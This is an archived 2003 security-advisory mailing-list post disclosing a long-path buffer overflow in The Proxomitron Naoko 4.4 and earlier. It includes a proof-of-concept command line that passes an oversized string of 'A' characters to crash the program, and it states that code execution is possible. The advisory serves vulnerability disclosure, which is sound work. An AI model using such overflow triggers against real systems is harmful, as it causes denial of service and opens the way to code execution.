NEOHAPSIS - Peace of Mind Through Integrity and Insight

Neohapsis is currently accepting applications for employment. For more information, please visit our website www.neohapsis.com or email hr@neohapsis.com

Neohapsis > Archives > Vulnwatch> 2003-q1

From: Grégory Le Bras | Security Corporation (gregory.lebras_at_security-corp.org)
Date: Wed Feb 19 2003 - 14:23:33 CST

Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

.: Proxomitron Naoko Long Path Buffer Overflow/DoS :.
________________________________________________________________________

Security Corporation Security Advisory [SCSA-005]
________________________________________________________________________

PROGRAM: The Proxomitron Naoko
HOMEPAGE: http://www.proxomitron.org/
VULNERABLE VERSIONS: 4.4 and prior
________________________________________________________________________

DESCRIPTION
________________________________________________________________________

The Proxomitron is an Universal Web Filter.
(direct quote from Proxomitron website)

DETAILS & EXPLOITS
________________________________________________________________________

Sending a parameter with a buffer of 1024 bytes in length or more, causes
Proxomitron Naoko to crash.

This vulnerability can be easily exploited to execute code.

Exploitation example :

c:\Proxomitron>proxomitron AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAA

SOLUTIONS
________________________________________________________________________

No solution for the moment.

VENDOR STATUS
________________________________________________________________________

The vendor has reportedly been notified

LINKS
________________________________________________________________________

French Version : http://www.security-corp.org/advisories/SCSA-005-FR.txt

------------------------------------------------------------
Grégory Le Bras aka GaLiaRePt | http://www.Security-Corp.org
------------------------------------------------------------

Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]